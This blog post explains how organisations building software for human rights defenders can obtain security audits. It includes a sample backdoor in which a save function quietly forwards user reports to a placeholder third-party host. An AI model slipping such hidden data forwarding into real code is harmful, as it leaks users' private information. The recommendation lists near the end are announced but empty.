17 July 2020
Attacks against human rights defenders have been on the rise in recent years, in both the physical and digital domains. While no device or account is unhackable, good cyber security practices, like the tactics proposed in the Digital First Aid Kit or Surveillance Self Defense, can at least make penetrating a system more resource-intensive. However, even strong cyber security hygiene will be less effective, or even futile, if the tools human rights defenders rely on contain vulnerabilities in their code that can be weaponised.
This blog post offers some options to organisations creating public interest technology that want to ensure the software they develop undergoes a rigorous security audit. We explain the advantages and disadvantages of each approach and highlight some of the limitations faced by organisations with small budgets or teams. We conclude with recommendations to donors and developers to push for stronger and more accessible security practices when building tools for civil society.
Regardless of the option chosen by the organisation behind the tool, it is also key that users of public interest technology understand each of the approaches we outline below. Above all, users should appreciate the strengths and weaknesses of each alternative to determine what fits their risk profile.
This post does not cover cyber security practices that app users and their organisations should consider. Organisations should think about their security in a broad sense, ensuring that team members have basic security skills, shared infrastructure is scrutinised, and resources are dedicated to security. For groups who need support thinking through these kinds of challenges, The Engine Room’s light-touch support might be a good resource.
All systems have vulnerabilities, but many of them may not be obvious. Some vulnerabilities can expose a system to serious damage even though, from the user’s perspective, the app works without a hitch. Commercial companies often have their own internal cyber security teams whose job is to find flaws in the code and patch them before a hacker can exploit them.
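To illustrate how a flaw can hide behind an app that appears to work perfectly, here is a minimal, hypothetical Python sketch (the function names are invented for this example). Both functions produce a session token that looks fine to the user, but the first relies on a predictable random number generator, which is exactly the kind of subtle weakness an internal security review is meant to catch.

```python
import random
import secrets
import string

# Hypothetical illustration: both versions "work" from the user's perspective,
# but the first is a subtle vulnerability a security review should flag.

def make_session_token_insecure(length: int = 32) -> str:
    # random.choices() uses a predictable, non-cryptographic PRNG; an attacker
    # who observes enough tokens may be able to predict future ones and
    # hijack user sessions.
    return "".join(random.choices(string.ascii_letters + string.digits, k=length))

def make_session_token_secure(nbytes: int = 32) -> str:
    # secrets.token_urlsafe() draws from a cryptographically secure source.
    return secrets.token_urlsafe(nbytes)
```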
Establishing an internal unit gives developers direct control, but assembling the right team is resource-intensive and costly. As such, in-house testing is often not feasible for smaller or less well-resourced organisations developing public interest technology. An alternative is to outsource these services, for instance by opening the code or contracting external expertise.
An organisation may opt to open its code to the public for analysis, for example by uploading it to GitHub and sharing it for review. This is the most affordable option and can be a good way of obtaining external opinions. When the source code is open, anyone can inspect it and search for vulnerabilities, such as a backdoor that sends private information to a third party. If someone identifies a vulnerability, the finding can also help other NGOs in the human rights community, who normally do not have the capacity or resources to conduct such analysis themselves, before they start using the software.
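As a purely hypothetical illustration (the endpoint and function name below are invented), this is the kind of pattern an outside reviewer with access to the source code could flag: a function that saves a user’s data as expected but also quietly forwards it to an undisclosed third party, even though the app behaves normally for the user.

```python
import json
import urllib.request

# Invented endpoint, for illustration only.
THIRD_PARTY_URL = "https://collector.example.com/submit"

def save_report(report: dict) -> None:
    # Expected behaviour: persist the user's report locally.
    with open("report.json", "w") as fh:
        json.dump(report, fh)

    # Hidden behaviour a code reviewer could spot: the same data is quietly
    # forwarded to a third-party server, with no indication to the user.
    payload = json.dumps(report).encode("utf-8")
    request = urllib.request.Request(
        THIRD_PARTY_URL,
        data=payload,
        headers={"Content-Type": "application/json"},
    )
    urllib.request.urlopen(request)
```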
However, both the app developers and users will still have to assess the skills of whoever audited the code, and they will have no control over the thoroughness, quality or frequency of the testing, or whether the code is tested at all. Most of the apps created for human rights defenders and other small communities are niche, with user bases of only a few thousand people. Organisations can increase the chance of having their code tested by reaching out to supporters, peers and open source communities. Still, this option may not attract the attention of cyber security experts, who tend to evaluate software or apps with a wider reach.
Bounty-type programs might incentivise cyber security experts from other communities to audit the code. The “bounty” (the reward for reviewing the code) can be a token of appreciation, like a t-shirt or public recognition. However, the success of this approach will depend on the reputation of the organisation or its tool, and it can be hard to attract skilful testing and reporting, particularly without a monetary reward.
Alternatively, organisations can turn to a specialised company for a review or audit of the code. For organisations developing apps, hiring penetration testers (also called pen-testers or ethical hackers) is an effective way of testing the strength of the code. A pen-test is a purposeful attack on a computer system, network or application, designed to reveal vulnerabilities that could lead to a security breach or the disclosure of sensitive data. Generally, the results are captured in a report with insights that can improve the security of the system evaluated.
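As a rough illustration only, the sketch below shows the kind of simple automated probe a pen-tester might script alongside manual testing: it checks whether a web application the tester is authorised to assess sets a few common HTTP security headers. Real penetration tests go far beyond checks like this, and the requests library and target URL here are assumptions made for the example.

```python
import sys
import requests  # third-party library: pip install requests

# Toy example only: a real pen-test combines manual exploitation with many
# automated probes. This sketch merely reports whether a target sets a few
# widely recommended HTTP security headers.
EXPECTED_HEADERS = [
    "Strict-Transport-Security",
    "Content-Security-Policy",
    "X-Content-Type-Options",
]

def check_security_headers(url: str) -> None:
    response = requests.get(url, timeout=10)
    for header in EXPECTED_HEADERS:
        status = "present" if header in response.headers else "MISSING"
        print(f"{header}: {status}")

if __name__ == "__main__":
    # Usage: python check_headers.py https://app.example.org
    check_security_headers(sys.argv[1])
```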
Contracting a company with a solid reputation can ensure audits that are thorough and as frequent as needed, but organisations should bear in mind that the fees can be high. Unlike other sectors, such as the legal profession, IT security has not yet developed a culture of pro bono work. Even with an NGO discount, ethical hacking services can cost a few thousand US dollars for a consultation, so it is important to do thorough due diligence before contracting an external company. This can include checking the certifications the company holds, talking to previous customers and asking about their internal security (since they will store highly sensitive data detailing the organisation’s vulnerabilities). It is also important to ask about the types of pen-testing the company conducts, how they will transmit the results, and whether they offer support for implementing any corrective actions needed.
When contracting external expertise, organisations may consider publishing the findings. Before doing so, it is important to check the terms of the contract, as some companies may not allow publication of the full report. While releasing the document, or part of it, can be beneficial to users, security audit reports can be quite technical and difficult to understand. In practice, users may end up relying on your organisation’s word about the soundness of the code, or on the pen-tester’s reputation.
As we’ve discussed above, many routes for accessing a security audit can be beyond the reach of small and/or under-resourced organisations. Addressing these limitations is the responsibility not just of the organisations themselves, but others within the ecosystem, too. Below are some recommendations to make security testing more widely accessible.
Recommendations for civil society organisations developing public interest technology, in particular tools for human rights defenders and other communities at risk
The responsibility for building secure non-profit tools does not lie only with NGOs and civil society, but also with funders. To contribute to stronger tools, funders can:
This article, authored by Wendy Betts, former Director at eyeWitness to Atrocities, and Raquel Vazquez Llorente, former Senior Legal Advisor at eyeWitness to Atrocities, was originally published on The Engine Room.